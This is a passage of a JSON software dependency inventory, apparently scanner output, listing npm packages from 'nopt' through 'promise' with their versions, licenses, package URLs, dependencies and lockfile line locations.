"5.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "abbrev@1.1.1" ], "Locations": [ { "StartLine": 13311, "EndLine": 13326 } ], "AnalyzedBy": "npm" }, { "ID": "nopt@8.1.0", "Name": "nopt", "Identifier": { "PURL": "pkg:npm/nopt@8.1.0", "UID": "b0f50499e32eca0b" }, "Version": "8.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "abbrev@3.0.1" ], "Locations": [ { "StartLine": 15114, "EndLine": 15127 } ], "AnalyzedBy": "npm" }, { "ID": "normalize-package-data@2.5.0", "Name": "normalize-package-data", "Identifier": { "PURL": "pkg:npm/normalize-package-data@2.5.0", "UID": "bc372266b2342be6" }, "Version": "2.5.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hosted-git-info@2.8.9", "resolve@1.22.10", "semver@5.7.2", "validate-npm-package-license@3.0.4" ], "Locations": [ { "StartLine": 18868, "EndLine": 18879 } ], "AnalyzedBy": "npm" }, { "ID": "normalize-package-data@3.0.3", "Name": "normalize-package-data", "Identifier": { "PURL": "pkg:npm/normalize-package-data@3.0.3", "UID": "5c02bc3329583696" }, "Version": "3.0.3", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hosted-git-info@4.1.0", "is-core-module@2.16.1", "semver@7.7.3", "validate-npm-package-license@3.0.4" ], "Locations": [ { "StartLine": 13327, "EndLine": 13341 } ], "AnalyzedBy": "npm" }, { "ID": "normalize-path@3.0.0", "Name": "normalize-path", "Identifier": { "PURL": "pkg:npm/normalize-path@3.0.0", "UID": "23eece3d352cd2c5" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13354, "EndLine": 13362 } ], "AnalyzedBy": "npm" }, { "ID": "npm-audit-report@6.0.0", "Name": "npm-audit-report", "Identifier": { "PURL": "pkg:npm/npm-audit-report@6.0.0", "UID": "432331d1906dd732" }, "Version": "6.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15128, "EndLine": 15135 } ], "AnalyzedBy": "npm" }, { "ID": "npm-bundled@4.0.0", "Name": "npm-bundled", "Identifier": { "PURL": "pkg:npm/npm-bundled@4.0.0", "UID": "e1d49ae79e497c5c" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "npm-normalize-package-bin@4.0.0" ], "Locations": [ { "StartLine": 15136, "EndLine": 15146 } ], "AnalyzedBy": "npm" }, { "ID": "npm-install-checks@7.1.2", "Name": "npm-install-checks", "Identifier": { "PURL": "pkg:npm/npm-install-checks@7.1.2", "UID": "d8884e8a62b892e5" }, "Version": "7.1.2", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "semver@7.7.3" ], "Locations": [ { "StartLine": 15147, "EndLine": 15157 } ], "AnalyzedBy": "npm" }, { "ID": "npm-normalize-package-bin@4.0.0", "Name": "npm-normalize-package-bin", "Identifier": { "PURL": "pkg:npm/npm-normalize-package-bin@4.0.0", "UID": "9258634d53be0439" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15158, "EndLine": 15165 } ], "AnalyzedBy": "npm" }, { "ID": "npm-package-arg@13.0.1", "Name": "npm-package-arg", "Identifier": { "PURL": "pkg:npm/npm-package-arg@13.0.1", "UID": "6ca13cd3d216e24d" }, "Version": "13.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "hosted-git-info@9.0.2", "proc-log@5.0.0", "semver@7.7.3", "validate-npm-package-name@6.0.2" ], "Locations": [ { "StartLine": 15166, "EndLine": 15179 } ], "AnalyzedBy": "npm" }, { "ID": "npm-packlist@10.0.2", "Name": "npm-packlist", "Identifier": { "PURL": "pkg:npm/npm-packlist@10.0.2", "UID": "526b387e5bfd35b" }, "Version": "10.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ignore-walk@8.0.0", "proc-log@5.0.0" ], "Locations": [ { "StartLine": 15180, "EndLine": 15191 } ], "AnalyzedBy": "npm" }, { "ID": "npm-pick-manifest@11.0.1", "Name": "npm-pick-manifest", "Identifier": { "PURL": "pkg:npm/npm-pick-manifest@11.0.1", "UID": "fae2dff5cf86a4ca" }, "Version": "11.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "npm-install-checks@7.1.2", "npm-normalize-package-bin@4.0.0", "npm-package-arg@13.0.1", "semver@7.7.3" ], "Locations": [ { "StartLine": 15192, "EndLine": 15205 } ], "AnalyzedBy": "npm" }, { "ID": "npm-profile@12.0.0", "Name": "npm-profile", "Identifier": { "PURL": "pkg:npm/npm-profile@12.0.0", "UID": "639b52aa0e50991e" }, "Version": "12.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "npm-registry-fetch@19.0.0", "proc-log@5.0.0" ], "Locations": [ { "StartLine": 15206, "EndLine": 15217 } ], "AnalyzedBy": "npm" }, { "ID": "npm-registry-fetch@19.0.0", "Name": "npm-registry-fetch", "Identifier": { "PURL": "pkg:npm/npm-registry-fetch@19.0.0", "UID": "33bb152abd704b87" }, "Version": "19.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/redact@3.2.2", "jsonparse@1.3.1", "make-fetch-happen@15.0.2", "minipass-fetch@4.0.1", "minipass@7.1.2", "minizlib@3.1.0", "npm-package-arg@13.0.1", "proc-log@5.0.0" ], "Locations": [ { "StartLine": 15218, "EndLine": 15235 } ], "AnalyzedBy": "npm" }, { "ID": "npm-run-path@4.0.1", "Name": "npm-run-path", "Identifier": { "PURL": "pkg:npm/npm-run-path@4.0.1", "UID": "4b4cac3857a656b2" }, "Version": "4.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "path-key@3.1.1" ], "Locations": [ { "StartLine": 13517, "EndLine": 13528 } ], "AnalyzedBy": "npm" }, { "ID": "npm-user-validate@3.0.0", "Name": "npm-user-validate", "Identifier": { "PURL": "pkg:npm/npm-user-validate@3.0.0", "UID": "3df36bde6688be39" }, "Version": "3.0.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15236, "EndLine": 15243 } ], "AnalyzedBy": "npm" }, { "ID": "npmlog@4.1.2", "Name": "npmlog", "Identifier": { "PURL": "pkg:npm/npmlog@4.1.2", "UID": "9c78309329f18462" }, "Version": "4.1.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "are-we-there-yet@1.1.7", "console-control-strings@1.1.0", "gauge@2.7.4", "set-blocking@2.0.0" ], "Locations": [ { "StartLine": 17380, "EndLine": 17392 } ], "AnalyzedBy": "npm" }, { "ID": "npmlog@6.0.2", "Name": "npmlog", "Identifier": { "PURL": "pkg:npm/npmlog@6.0.2", "UID": "de43b72f4934e7a3" }, "Version": "6.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "are-we-there-yet@3.0.1", "console-control-strings@1.1.0", "gauge@4.0.4", "set-blocking@2.0.0" ], "Locations": [ { "StartLine": 15989, "EndLine": 16005 } ], "AnalyzedBy": "npm" }, { "ID": "nth-check@2.1.1", "Name": "nth-check", "Identifier": { "PURL": "pkg:npm/nth-check@2.1.1", "UID": "a9bfa0f379dc49a7" }, "Version": "2.1.1", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "boolbase@1.0.0" ], "Locations": [ { "StartLine": 16006, "EndLine": 16017 } ], "AnalyzedBy": "npm" }, { "ID": "nullthrows@1.1.1", "Name": "nullthrows", "Identifier": { "PURL": "pkg:npm/nullthrows@1.1.1", "UID": "2e584d24989e615" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16018, "EndLine": 16023 } ], "AnalyzedBy": "npm" }, { "ID": "number-is-nan@1.0.1", "Name": "number-is-nan", "Identifier": { "PURL": "pkg:npm/number-is-nan@1.0.1", "UID": "c204822dea562b4d" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16024, "EndLine": 16032 } ], "AnalyzedBy": "npm" }, { "ID": "ob1@0.83.3", "Name": "ob1", "Identifier": { "PURL": "pkg:npm/ob1@0.83.3", "UID": "cd8b562972f07ad2" }, "Version": "0.83.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "flow-enums-runtime@0.0.6" ], "Locations": [ { "StartLine": 16033, "EndLine": 16044 } ], "AnalyzedBy": "npm" }, { "ID": "object-assign@4.1.1", "Name": "object-assign", "Identifier": { "PURL": "pkg:npm/object-assign@4.1.1", "UID": "17264ab0b69cb02b" }, "Version": "4.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16045, "EndLine": 16053 } ], "AnalyzedBy": "npm" }, { "ID": "object-inspect@1.13.4", "Name": "object-inspect", "Identifier": { "PURL": "pkg:npm/object-inspect@1.13.4", "UID": "e14f24d916e863f9" }, "Version": "1.13.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16054, "EndLine": 16066 } ], "AnalyzedBy": "npm" }, { "ID": "on-finished@2.3.0", "Name": "on-finished", "Identifier": { "PURL": "pkg:npm/on-finished@2.3.0", "UID": "2054b9429d73a76d" }, "Version": "2.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ee-first@1.1.1" ], "Locations": [ { "StartLine": 9282, "EndLine": 9293 } ], "AnalyzedBy": "npm" }, { "ID": "on-finished@2.4.1", "Name": "on-finished", "Identifier": { "PURL": "pkg:npm/on-finished@2.4.1", "UID": "c75def942e2f81b5" }, "Version": "2.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ee-first@1.1.1" ], "Locations": [ { "StartLine": 16152, "EndLine": 16163 } ], "AnalyzedBy": "npm" }, { "ID": "on-headers@1.1.0", "Name": "on-headers", "Identifier": { "PURL": "pkg:npm/on-headers@1.1.0", "UID": "b766287aa9e420f8" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16164, "EndLine": 16173 } ], "AnalyzedBy": "npm" }, { "ID": "once@1.4.0", "Name": "once", "Identifier": { "PURL": "pkg:npm/once@1.4.0", "UID": "3bb1402638e3975a" }, "Version": "1.4.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "wrappy@1.0.2" ], "Locations": [ { "StartLine": 16174, "EndLine": 16182 } ], "AnalyzedBy": "npm" }, { "ID": "onetime@5.1.2", "Name": "onetime", "Identifier": { "PURL": "pkg:npm/onetime@5.1.2", "UID": "a2b295130e36fd20" }, "Version": "5.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mimic-fn@2.1.0" ], "Locations": [ { "StartLine": 16183, "EndLine": 16197 } ], "AnalyzedBy": "npm" }, { "ID": "open@6.4.0", "Name": "open", "Identifier": { "PURL": "pkg:npm/open@6.4.0", "UID": "d5daf92e6b7299fd" }, "Version": "6.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-wsl@1.1.0" ], "Locations": [ { "StartLine": 16198, "EndLine": 16210 } ], "AnalyzedBy": "npm" }, { "ID": "open@7.4.2", "Name": "open", "Identifier": { "PURL": "pkg:npm/open@7.4.2", "UID": "439614f29e6cb50c" }, "Version": "7.4.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-docker@2.2.1", "is-wsl@2.2.0" ], "Locations": [ { "StartLine": 4654, "EndLine": 4669 }, { "StartLine": 16441, "EndLine": 16457 } ], "AnalyzedBy": "npm" }, { "ID": "ora@5.4.1", "Name": "ora", "Identifier": { "PURL": "pkg:npm/ora@5.4.1", "UID": "f429251c7045f739" }, "Version": "5.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bl@4.1.0", "chalk@4.1.2", "cli-cursor@3.1.0", "cli-spinners@2.9.2", "is-interactive@1.0.0", "is-unicode-supported@0.1.0", "log-symbols@4.1.0", "strip-ansi@6.0.1", "wcwidth@1.0.1" ], "Locations": [ { "StartLine": 16229, "EndLine": 16251 } ], "AnalyzedBy": "npm" }, { "ID": "p-limit@2.3.0", "Name": "p-limit", "Identifier": { "PURL": "pkg:npm/p-limit@2.3.0", "UID": "918cfda1682adaa1" }, "Version": "2.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-try@2.2.0" ], "Locations": [ { "StartLine": 3479, "EndLine": 3493 }, { "StartLine": 11974, "EndLine": 11989 }, { "StartLine": 16643, "EndLine": 16658 }, { "StartLine": 16709, "EndLine": 16723 }, { "StartLine": 18826, "EndLine": 18840 } ], "AnalyzedBy": "npm" }, { "ID": "p-limit@3.1.0", "Name": "p-limit", "Identifier": { "PURL": "pkg:npm/p-limit@3.1.0", "UID": "f283ab8f83f3f063" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "yocto-queue@0.1.0" ], "Locations": [ { "StartLine": 16270, "EndLine": 16284 } ], "AnalyzedBy": "npm" }, { "ID": "p-locate@3.0.0", "Name": "p-locate", "Identifier": { "PURL": "pkg:npm/p-locate@3.0.0", "UID": "636b9adc31b6db3b" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-limit@2.3.0" ], "Locations": [ { "StartLine": 16724, "EndLine": 16735 } ], "AnalyzedBy": "npm" }, { "ID": "p-locate@4.1.0", "Name": "p-locate", "Identifier": { "PURL": "pkg:npm/p-locate@4.1.0", "UID": "6a8ae83d3fa69c0c" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-limit@2.3.0" ], "Locations": [ { "StartLine": 3494, "EndLine": 3505 }, { "StartLine": 11990, "EndLine": 12002 }, { "StartLine": 16659, "EndLine": 16671 }, { "StartLine": 18841, "EndLine": 18852 } ], "AnalyzedBy": "npm" }, { "ID": "p-locate@5.0.0", "Name": "p-locate", "Identifier": { "PURL": "pkg:npm/p-locate@5.0.0", "UID": "7313a8aad19940b0" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-limit@3.1.0" ], "Locations": [ { "StartLine": 16285, "EndLine": 16299 } ], "AnalyzedBy": "npm" }, { "ID": "p-map@4.0.0", "Name": "p-map", "Identifier": { "PURL": "pkg:npm/p-map@4.0.0", "UID": "51bef0d9d1e64057" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "aggregate-error@3.1.0" ], "Locations": [ { "StartLine": 16300, "EndLine": 16315 } ], "AnalyzedBy": "npm" }, { "ID": "p-map@7.0.3", "Name": "p-map", "Identifier": { "PURL": "pkg:npm/p-map@7.0.3", "UID": "401e13028ba72a92" }, "Version": "7.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15244, "EndLine": 15254 } ], "AnalyzedBy": "npm" }, { "ID": "p-try@2.2.0", "Name": "p-try", "Identifier": { "PURL": "pkg:npm/p-try@2.2.0", "UID": "212c3cd0b4327f58" }, "Version": "2.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16316, "EndLine": 16324 } ], "AnalyzedBy": "npm" }, { "ID": "package-json-from-dist@1.0.1", "Name": "package-json-from-dist", "Identifier": { "PURL": "pkg:npm/package-json-from-dist@1.0.1", "UID": "fab7744928e239b3" }, "Version": "1.0.1", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15255, "EndLine": 15261 }, { "StartLine": 16325, "EndLine": 16330 } ], "AnalyzedBy": "npm" }, { "ID": "pacote@21.0.3", "Name": "pacote", "Identifier": { "PURL": "pkg:npm/pacote@21.0.3", "UID": "d1d76a7ec933d234" }, "Version": "21.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/git@7.0.0", "@npmcli/installed-package-contents@3.0.0", "@npmcli/package-json@7.0.1", "@npmcli/promise-spawn@8.0.3", "@npmcli/run-script@10.0.0", "cacache@20.0.1", "fs-minipass@3.0.3", "minipass@7.1.2", "npm-package-arg@13.0.1", "npm-packlist@10.0.2", "npm-pick-manifest@11.0.1", "npm-registry-fetch@19.0.0", "proc-log@5.0.0", "promise-retry@2.0.1", "sigstore@4.0.0", "ssri@12.0.0", "tar@7.5.1" ], "Locations": [ { "StartLine": 15262, "EndLine": 15291 } ], "AnalyzedBy": "npm" }, { "ID": "parent-module@1.0.1", "Name": "parent-module", "Identifier": { "PURL": "pkg:npm/parent-module@1.0.1", "UID": "7fc03d455f2a5af2" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "callsites@3.1.0" ], "Locations": [ { "StartLine": 16331, "EndLine": 16342 } ], "AnalyzedBy": "npm" }, { "ID": "parse-conflict-json@4.0.0", "Name": "parse-conflict-json", "Identifier": { "PURL": "pkg:npm/parse-conflict-json@4.0.0", "UID": "7e8e015a5b2228f" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "json-parse-even-better-errors@4.0.0", "just-diff-apply@5.5.0", "just-diff@6.0.2" ], "Locations": [ { "StartLine": 15292, "EndLine": 15304 } ], "AnalyzedBy": "npm" }, { "ID": "parse-json@5.2.0", "Name": "parse-json", "Identifier": { "PURL": "pkg:npm/parse-json@5.2.0", "UID": "22bd3ee0aa2a8eb9" }, "Version": "5.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/code-frame@7.27.1", "error-ex@1.3.4", "json-parse-even-better-errors@2.3.1", "lines-and-columns@1.2.4" ], "Locations": [ { "StartLine": 16343, "EndLine": 16360 } ], "AnalyzedBy": "npm" }, { "ID": "parseurl@1.3.3", "Name": "parseurl", "Identifier": { "PURL": "pkg:npm/parseurl@1.3.3", "UID": "a527c1569080591d" }, "Version": "1.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16361, "EndLine": 16369 } ], "AnalyzedBy": "npm" }, { "ID": "path-dirname@1.0.2", "Name": "path-dirname", "Identifier": { "PURL": "pkg:npm/path-dirname@1.0.2", "UID": "64e1752692558582" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16491, "EndLine": 16496 } ], "AnalyzedBy": "npm" }, { "ID": "path-exists@3.0.0", "Name": "path-exists", "Identifier": { "PURL": "pkg:npm/path-exists@3.0.0", "UID": "40b98528c00ded2b" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16736, "EndLine": 16744 } ], "AnalyzedBy": "npm" }, { "ID": "path-exists@4.0.0", "Name": "path-exists", "Identifier": { "PURL": "pkg:npm/path-exists@4.0.0", "UID": "733e691b52e25af3" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16497, "EndLine": 16505 } ], "AnalyzedBy": "npm" }, { "ID": "path-extra@1.0.3", "Name": "path-extra", "Identifier": { "PURL": "pkg:npm/path-extra@1.0.3", "UID": "a4659da8983d9733" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16506, "EndLine": 16511 } ], "AnalyzedBy": "npm" }, { "ID": "path-is-absolute@1.0.1", "Name": "path-is-absolute", "Identifier": { "PURL": "pkg:npm/path-is-absolute@1.0.1", "UID": "6e324b98e50987e" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16512, "EndLine": 16520 } ], "AnalyzedBy": "npm" }, { "ID": "path-key@3.1.1", "Name": "path-key", "Identifier": { "PURL": "pkg:npm/path-key@3.1.1", "UID": "2310cf414a8dc6d1" }, "Version": "3.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15305, "EndLine": 15314 }, { "StartLine": 16521, "EndLine": 16529 } ], "AnalyzedBy": "npm" }, { "ID": "path-parse@1.0.7", "Name": "path-parse", "Identifier": { "PURL": "pkg:npm/path-parse@1.0.7", "UID": "9e117fccc15f120d" }, "Version": "1.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16530, "EndLine": 16535 } ], "AnalyzedBy": "npm" }, { "ID": "path-scurry@1.11.1", "Name": "path-scurry", "Identifier": { "PURL": "pkg:npm/path-scurry@1.11.1", "UID": "56ae2c274003efa0" }, "Version": "1.11.1", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lru-cache@10.4.3", "minipass@7.1.2" ], "Locations": [ { "StartLine": 15097, "EndLine": 15113 }, { "StartLine": 16536, "EndLine": 16551 } ], "AnalyzedBy": "npm" }, { "ID": "path-scurry@2.0.0", "Name": "path-scurry", "Identifier": { "PURL": "pkg:npm/path-scurry@2.0.0", "UID": "92990294c3d2a764" }, "Version": "2.0.0", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lru-cache@11.2.2", "minipass@7.1.2" ], "Locations": [ { "StartLine": 15315, "EndLine": 15329 } ], "AnalyzedBy": "npm" }, { "ID": "path-type@4.0.0", "Name": "path-type", "Identifier": { "PURL": "pkg:npm/path-type@4.0.0", "UID": "3e4249e8e0c818db" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16558, "EndLine": 16566 } ], "AnalyzedBy": "npm" }, { "ID": "paths-js@0.4.11", "Name": "paths-js", "Identifier": { "PURL": "pkg:npm/paths-js@0.4.11", "UID": "d612a6bb88801491" }, "Version": "0.4.11", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16567, "EndLine": 16575 } ], "AnalyzedBy": "npm" }, { "ID": "picocolors@1.1.1", "Name": "picocolors", "Identifier": { "PURL": "pkg:npm/picocolors@1.1.1", "UID": "cf7d2b7286a113db" }, "Version": "1.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16576, "EndLine": 16581 } ], "AnalyzedBy": "npm" }, { "ID": "picomatch@2.3.1", "Name": "picomatch", "Identifier": { "PURL": "pkg:npm/picomatch@2.3.1", "UID": "4893c2a2be9c6269" }, "Version": "2.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16582, "EndLine": 16593 } ], "AnalyzedBy": "npm" }, { "ID": "picomatch@4.0.3", "Name": "picomatch", "Identifier": { "PURL": "pkg:npm/picomatch@4.0.3", "UID": "ebc01f786eb09b8f" }, "Version": "4.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15752, "EndLine": 15764 } ], "AnalyzedBy": "npm" }, { "ID": "pirates@4.0.7", "Name": "pirates", "Identifier": { "PURL": "pkg:npm/pirates@4.0.7", "UID": "f35f54f4dbe6b0da" }, "Version": "4.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16594, "EndLine": 16602 } ], "AnalyzedBy": "npm" }, { "ID": "pkg-up@3.1.0", "Name": "pkg-up", "Identifier": { "PURL": "pkg:npm/pkg-up@3.1.0", "UID": "c5fb3f1f1bf344a1" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "find-up@3.0.0" ], "Locations": [ { "StartLine": 16672, "EndLine": 16683 } ], "AnalyzedBy": "npm" }, { "ID": "plist@3.1.0", "Name": "plist", "Identifier": { "PURL": "pkg:npm/plist@3.1.0", "UID": "2159ab0b66853f64" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@xmldom/xmldom@0.8.11", "base64-js@1.5.1", "xmlbuilder@15.1.1" ], "Locations": [ { "StartLine": 16745, "EndLine": 16758 } ], "AnalyzedBy": "npm" }, { "ID": "point-in-polygon@1.1.0", "Name": "point-in-polygon", "Identifier": { "PURL": "pkg:npm/point-in-polygon@1.1.0", "UID": "22feacee61dfa3ed" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16759, "EndLine": 16764 } ], "AnalyzedBy": "npm" }, { "ID": "possible-typed-array-names@1.1.0", "Name": "possible-typed-array-names", "Identifier": { "PURL": "pkg:npm/possible-typed-array-names@1.1.0", "UID": "8d1a55380f80c2a6" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16765, "EndLine": 16773 } ], "AnalyzedBy": "npm" }, { "ID": "postcss-selector-parser@7.1.0", "Name": "postcss-selector-parser", "Identifier": { "PURL": "pkg:npm/postcss-selector-parser@7.1.0", "UID": "5253c4c80e4f262a" }, "Version": "7.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cssesc@3.0.0", "util-deprecate@1.0.2" ], "Locations": [ { "StartLine": 15330, "EndLine": 15341 } ], "AnalyzedBy": "npm" }, { "ID": "postcss-value-parser@4.2.0", "Name": "postcss-value-parser", "Identifier": { "PURL": "pkg:npm/postcss-value-parser@4.2.0", "UID": "24fbfb2de20423d6" }, "Version": "4.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16774, "EndLine": 16779 } ], "AnalyzedBy": "npm" }, { "ID": "prebuild-install@7.1.3", "Name": "prebuild-install", "Identifier": { "PURL": "pkg:npm/prebuild-install@7.1.3", "UID": "5c73c7cda1ec2e83" }, "Version": "7.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "detect-libc@2.1.2", "expand-template@2.0.3", "github-from-package@0.0.0", "minimist@1.2.8", "mkdirp-classic@0.5.3", "napi-build-utils@2.0.0", "node-abi@3.78.0", "pump@3.0.3", "rc@1.2.8", "simple-get@4.0.1", "tar-fs@2.1.4", "tunnel-agent@0.6.0" ], "Locations": [ { "StartLine": 16788, "EndLine": 16813 } ], "AnalyzedBy": "npm" }, { "ID": "prettier@3.6.2", "Name": "prettier", "Identifier": { "PURL": "pkg:npm/prettier@3.6.2", "UID": "39a9648909e0d0be" }, "Version": "3.6.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 17644, "EndLine": 17658 } ], "AnalyzedBy": "npm" }, { "ID": "pretty-format@29.7.0", "Name": "pretty-format", "Identifier": { "PURL": "pkg:npm/pretty-format@29.7.0", "UID": "cccee948a1b3dec" }, "Version": "29.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jest/schemas@29.6.3", "ansi-styles@5.2.0", "react-is@18.3.1" ], "Locations": [ { "StartLine": 16868, "EndLine": 16881 } ], "AnalyzedBy": "npm" }, { "ID": "proc-log@5.0.0", "Name": "proc-log", "Identifier": { "PURL": "pkg:npm/proc-log@5.0.0", "UID": "3cb31a9f93e775c1" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15342, "EndLine": 15349 } ], "AnalyzedBy": "npm" }, { "ID": "process@0.11.10", "Name": "process", "Identifier": { "PURL": "pkg:npm/process@0.11.10", "UID": "1a76772fb0cdfeb3" }, "Version": "0.11.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16894, "EndLine": 16902 } ], "AnalyzedBy": "npm" }, { "ID": "process-nextick-args@2.0.1", "Name": "process-nextick-args", "Identifier": { "PURL": "pkg:npm/process-nextick-args@2.0.1", "UID": "6d05a458fbddcb8" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16903, "EndLine": 16908 } ], "AnalyzedBy": "npm" }, { "ID": "proggy@3.0.0", "Name": "proggy", "Identifier": { "PURL": "pkg:npm/proggy@3.0.0", "UID": "8af2dd0f3e26ce33" }, "Version": "3.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15350, "EndLine": 15357 } ], "AnalyzedBy": "npm" }, { "ID": "promise@7.3.1", "Name": "promise", "Identifier": { "PURL": "pkg:npm/promise@7.3.1", "UID": "f0053f6c4407710" }, "Version": "7.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ 